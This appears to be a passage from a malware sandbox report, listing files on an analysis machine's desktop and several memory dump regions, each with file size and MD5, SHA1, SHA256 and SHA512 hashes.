d2bceaae0d6007b19290a0cf23af2de776e54048

SHA256
6c7c8435be2ca7d466fcc7d1a3f2bd4caa1826b245a7905d2bb168b7da78de5f

SHA512
996de778e9bffe2ddd7b11add79980e1637661d9a93055d246566c78cfbe75ce98d6db07cb1fecafcc7dfa385c568eb86f532de35cd9ad0f6104504a3109f1c6

Download Submit
C:\Users\Admin\Desktop\InitializeEdit.htm

Filesize
340KB

MD5
dbf49e921bbfe7276010e8dd424b03e1

SHA1
8075b69dc9a62b0c21b04748b26b9b3a9320a80a

SHA256
f1d2c0e6bfaeaadc44bd667b8634e03c77b9e887c0e7a7959323ca3054e9d3b1

SHA512
69049bedfe4ccc4931442e8b6bccea50c6a6b6cc04b7e97bc05034564c91702f05d4aebde6177034348e8382deacc8de8897a7394863bb17ed0ddfeab7839bd5

Download Submit
C:\Users\Admin\Desktop\InitializeLock.dotm

Filesize
808KB

MD5
edd1079b5d787404aa8e08df06095fb7

SHA1
155f9121fa256eda0cba7e8e10748939b253321f

SHA256
f5059d13dc6e8cf641b68faad76e234332a6b14e4d1b116fb867c6ed883c50bc

SHA512
d229d46c4c0c18080d8483e541fd8b9e74945e538ba5216d5d13bd5913cd7c5bd7af3dc1389151f2c3e6e00bafcd38979576f6618bd34ac5615cde76450a6961

Download Submit
C:\Users\Admin\Desktop\InitializeSync.odt

Filesize
613KB

MD5
1bd77bdf667f644858760a909aac444b

SHA1
1f4508b1d06cfbc32f83090035ec0b2cf1ea6382

SHA256
bf4c19193cc4ac06890b9a1752bcb62358564c08adc9fc87bd766bd66dcef7a9

SHA512
ff09325692525bf08a42d68e66bb8a38e2fee8d2463e868fe88573c2f2e3da6e17b94a8f0c65180613065b6df88208444d5302386b26843c48a3ab10a212358c

Download Submit
C:\Users\Admin\Desktop\InitializeUninstall.asf

Filesize
516KB

MD5
658e4e5b09dec35f12e976c55667bf3e

SHA1
932e729f11a993ced68262a79aed8a073b8eff9f

SHA256
817248365ae32a2f3bfc054e0ab9e092816eecf813642194bbf6b957ae6b80eb

SHA512
fb2538479efb371c2992524e7b88d3e46e91b88b1c2f6d5e51e61cbd553445704d59b978de51490e4a018f5bbb8d113512a526a8bf439d838d7b8dff90da0466

Download Submit
C:\Users\Admin\Desktop\LockTrace.docx

Filesize
15KB

MD5
fa58ccffce0e09312b1413d0ee52a568

SHA1
af5e0ad04fe2a975605d04eef7517ea0a02f54df

SHA256
bb22432f166b88e53d0024766077fe6961388305dc94c40744807949fd847f1c

SHA512
e2a274721cbd77c9ec98e470c901047861842ae622127f8a59c677c99a1b1ab7adb0527b9eda210c9555b19163509a78bad7e0eee3a74cad8ef722dd687f8d12

Download Submit
C:\Users\Admin\Desktop\MoveRevoke.potm

Filesize
535KB

MD5
60aca86ed673c69157123238207bff48

SHA1
0a2bb7eeefbd094b8ee7298f1a95b6afd22cdcb3

SHA256
0c85f745a37946da25e18630e976b2f450ddd37528d0976e6f537cc80afd1b52

SHA512
be839c601c434efc348b344ee4a92eae52de622b5aa247f55619555a02139ee75ec11385c94806660415c9be59deb20b33cc8f36f97c18fef626e0f3a0d9f35b

Download Submit
C:\Users\Admin\Desktop\OutEdit.html

Filesize
438KB

MD5
4fb3c2565308fef53c58b92894a2e212

SHA1
c0bdf514948e6dd02815121078e2effc83c19b92

SHA256
252ca05f67f8e126d9caf15383a11f50748d2af808e8ad81c05b7d7a0f96fc5c

SHA512
2dc3520ca65b86431bcdfe76dd617853ffb280a323ef3b8673a39dd013e703cca3e09d4d0270eeb1ed74d25af005471d86eeda101f5f7804bac3422e073ece99

Download Submit
C:\Users\Admin\Desktop\ReceiveTrace.mov

Filesize
360KB

MD5
8a1f485fffbb38a1dba0e085489e2f32

SHA1
3c7dc53089ee0eff05fc1805601fa40fdb9d6ba7

SHA256
2b5e3dbdf6c49b97b414ab6a4c7ff3d4f3c5b2c39e1adc86458a90112960486f

SHA512
ed047da764fd76e8fa87f3de7c4b615038b20ec68c42b3431aeb3887435760d69a0e3937c2e592b8d2ee8f30903f570a956b9983568fd42d1c3a7027f7088c06

Download Submit
C:\Users\Admin\Desktop\RegisterHide.exe

Filesize
730KB

MD5
d1eb56df92cc72f260f95d2773cb77dd

SHA1
79389e23ae661eac1ed897a90ea21078b5c433cc

SHA256
69c586243ddaf0dddf5291f84b323baddea51ab12ce7e542e6175865a7e16dde

SHA512
b65ec706b456c0205499a03545d4734ed1d8d4d37d41c7807d483cb1413753d4f7f585855ff703d418697234f9e619a80ac481dbdab6c013d365235ce1532f79

Download Submit
C:\Users\Admin\Desktop\ResolveSet.mht

Filesize
379KB

MD5
14106a0106539ece78d3ee319bf1164e

SHA1
b29e1b42024806d336c75c16e6552759a4bc86e6

SHA256
4084ff443af6aefd6c5a8a3ab632fea93d9bdb3970ab650fc2cc949752865e8d

SHA512
4e509d64187cbc1df63a0d004e6e5cf1e1b774b4ae7d42cb5b8519eda30c226930d5a998d7fe52819c07c803f35df638645d6a5c0559b8799e92184994a8edd8

Download Submit
C:\Users\Admin\Desktop\SplitUse.docx

Filesize
18KB

MD5
1299884dc611c7c00c2692d91d330c23

SHA1
9737c2419d5b7089131c22fdf662d2f5c30698b4

SHA256
71a3192e715f8817c408933d636d355083b2664332ecc66bf1e3e0b8ec7fd0ed

SHA512
ba689767a954e420044fcf3ef339dc8e53f031368749a7cb129ec63aa76e67637101149ccde7e14d934f1c86270448673740454d327c34ad3c6d5a58e74ea765

Download Submit
C:\Users\Admin\Desktop\StartOptimize.emf

Filesize
457KB

MD5
b1c7c6a7cfcf4767cedc064e8a2bd016

SHA1
640cad7956563621c9712d2312a2fd9eb3d901bd

SHA256
7e3dd07d0ac4b04846d8e05e6b8320833c6c73591a27acf644e8ff9f9620975b

SHA512
27877ab32d05098ef5af4bff42f121e185a5cf85a7d40bcfa4ae2628d04ec68b009d8e5e17598e4429965072c8c8aa41938b5efcefd8e8814aa2ec467bdd0ca3

Download Submit
C:\Users\Admin\Desktop\SyncShow.aif

Filesize
633KB

MD5
d7ca33b03cb3b68095866227dd9b5d17

SHA1
19db3ee1a2049550025344c895341ff0f16885e9

SHA256
09482a59137869f727b2abfc98b0c2ed5167d004933ec0010130720591a34a59

SHA512
a90024c71cd1fb97995fe1201b82135b66a24795ed48ab38ef49249692210170b30ed51e65a91cd5b5541fbb5f41d6426eba2266f835f2e643deb78390420b33

Download Submit
C:\Users\Admin\Desktop\TraceResize.eprtx

Filesize
788KB

MD5
dc923d1759c4c67d70bb1c99619fad39

SHA1
2487f10b1dba719d7af469ea7deaba8ae74b7764

SHA256
d083dc9085a4a937cfdcbd4201134a2d4d6efb1e55fb74491897b4f02857438a

SHA512
9d7f0b51fe1d17acb795ddc68ebde2e9df071388cd2ce5c490cc2967d2cab8ac093ab756f1c25090618e44d509a18bc8e8d7bc0786c525a7fb1d13ceb16259ae

Download Submit
C:\Users\Admin\Desktop\UninstallDisable.eprtx

Filesize
691KB

MD5
2ca573bb7660b197e317b90f9fb34aec

SHA1
7f5ed1066802956dd3d0044699b04f60b7789466

SHA256
273d6ffa20ef36870c351771d550793a207fb78b2f30fbc20d8a9adf74ed15f0

SHA512
02f46d64e990d4f55c26b487f9e44050b1990b4b152d93401ee5a81b154f61f3e03bba7e3f7586da681089e983c410010ad6d24a1584de0fa359e3377911b69b

Download Submit
C:\Users\Admin\Desktop\UnpublishUnprotect.xlsx

Filesize
10KB

MD5
8e8871a604df4d5f91f6f4b816a37eeb

SHA1
d5c99a04afa594c38d931342016222c721f25e75

SHA256
7ac3ac87ed3d40d36c187a6e150e9562d3599687b82b9fdced67bcf0984ebf2d

SHA512
d944166c8e0d53db4bd2f3a7e803867a0e20daf576c13ad507e7524cea2148c9fea1fed1b4d3bd72650439a4c1c7675083e6757d517597f151aa0e0ddf534f79

Download Submit
C:\Users\Admin\Desktop\UnregisterMeasure.fon

Filesize
769KB

MD5
cfdc9f9c593d050ccdba2b1d937c071b

SHA1
1734ac6aa4f9c24ca95e57b9f462a7c4a767492d

SHA256
8b63a55c0e36ba49e8b7abac7604279036e7a56eba1ba9cade9ff09c919cbc3e

SHA512
d6e90d62fb5290887d125057b3cf43739dc68356df7c85d546fb90c90fe7480e661fc0480c87b8ac1100f64b54bc0668a5d4dc084297ef9e975670e837dcd4c0

Download Submit
C:\Users\Admin\Desktop\UpdateConvert.xml

Filesize
301KB

MD5
f53c6ea04acbebdd1d82d79a7b3d6dde

SHA1
02dc348f6208b4c7b7eb4d35c315e4b5de5002ee

SHA256
2cbcd0e9089907de69240de11862505557ade6ea1107d1a33c7c2a77b669e266

SHA512
f358fe754b950f02fa94237539c9f186b458e1aa9ad7ccf314963d561b68a13074fa6c1b225d5a231f663368a0d1dc7e39bf41bee7a9ab223d78ab1f3038e831

Download Submit
C:\Users\Admin\Desktop\UseCopy.ogg

Filesize
652KB

MD5
d7b09387df233f4146404066c571f801

SHA1
ecf03253cc1b7a22b44ce8897caab3a758b39c50

SHA256
7e155287e929219d497fab68ff60f9c55bacb92eb3b743e647d26f74417dedcb

SHA512
5eb266f77787576bb5ec3c97b119ecd90c06131434110225dae0a991ce74e620decb4efb8db447ea3d72b1c8bda524e69897ff4063558a4acd885952bf351e23

Download Submit
C:\Users\Admin\Desktop\WatchCompare.gif

Filesize
399KB

MD5
83462c3f7be3ce163e6cc05031985aad

SHA1
dcf360dc12a0925556c2a3ef7ebfc148493cc23c

SHA256
9e4200e44acc194d40a06629b6d6d5c61a0d0cbdebde2895fdd7809423ac3093

SHA512
0929200bf25dd1f2b285f103936c01677ccfdfe951b2d2783e8a907bc62c2be50345bd62e3a97dec4513ec0ef859d55b2b3777f1e4c27cb69306dd591bad6a43

Download Submit
C:\Users\Public\Desktop\Firefox.lnk

Filesize
1000B

MD5
c4caf0f95e4bcb35f079e9d613f3ac9c

SHA1
a59b62c710ba97d0e9dee5241a385b7fe4ec6a71

SHA256
7882a9a9f3bdc9b1d3b1bf51195aa11b0c86c33a3993b4b5592c5a7c732a3042

SHA512
2180636fecb72588d5ac46adfca5ee41297307a1863041222d13092bbd1ed869dae7d06c227d70ce37540e228f7fb7f20514f8f662d4b3b8d529e2b41c464717

Download Submit
C:\Users\Public\Desktop\Google Chrome.lnk

Filesize
2KB

MD5
cfdd65409f05d750c8036d7c12512db7

SHA1
9d9c9fff2d63a8ec0dec0f75ccfe90495392f330

SHA256
48508b4a84a26f9ed94c5ce0d829cbbb2574501c937b31aaff9f8a8c11f4bfed

SHA512
a350f3d370b4c2dafedc8ee2113b12ba1ac2b57f4792431012a0001e3bee0e00e8ba5ddea0764b75701125b1bc002dd55b9c1f6cd22b64e2251e0ffceb232b94

Download Submit
C:\Users\Public\Desktop\VLC media player.lnk

Filesize
923B

MD5
e845c89e82891dc1fea5598a7d8ef465

SHA1
dae7afbc6aade93e6e1e9f0f08c9d976624947c7

SHA256
b61287cca4bef5dbf993864981c1fe039d4ecc5d99869a3a1d9c907225b7426d

SHA512
e74d47dc06ea160c1ee3af7cd8b772bb0fabad8db4e4ff45b995a1db1381c3437ce957ac0708b7e67ad4a21e36c13beba2570eccef695dc668fd977d1aa9674f

Download Submit
memory/1492-47-0x0000000000E00000-0x0000000000E0E000-memory.dmp

Filesize
56KB

Download
memory/1960-86-0x00000000001D0000-0x00000000001E8000-memory.dmp

Filesize
96KB

Download
memory/3112-968-0x000001B9F19B0000-0x000001B9F19B1000-memory.dmp

Filesize
4KB

Download
memory/3112-966-0x000001B9F19B0000-0x000001B9F19B1000-memory.dmp

Filesize
4KB

Download
memory/3112-967-0x000001B9F19B0000-0x000001B9F19B1000-memory.dmp

Filesize
4KB

Download
memory/3112-978-0x000001B9F19B0000-0x000001B9F19B1000-memory.dmp

Filesize
4KB

Download
memory/3112-977-0x000001B9F19B0000-0x000001B9F19B1000-memory.dmp

Filesize
4KB

Download
memory/3112-976-0x000001B9F19B0000-0x000001B9F19B1000-memory.dmp

Filesize
4KB

Download
memory/3112-975-0x000001B9F19B0000-0x000001B9F19B1000-memory.dmp

Filesize
4KB

Download
memory/3112-974-0x000001B9F19B0000-0x000001B9F19B1000-memory.dmp

Filesize
4KB

Download
memory/3112-973-0x000001B9F19B0000-0x000001B9F19B1000-memory.dmp

Filesize
4KB

Download
memory/3112-972-0x000001B9F19B0000-0x000001B9F19B1000-memory.dmp

Filesize
4KB

Download
memory/4036-10-0x0000028D7CFA0000-0x0000028D7CFC2000-memory.dmp

Filesize
136KB

Download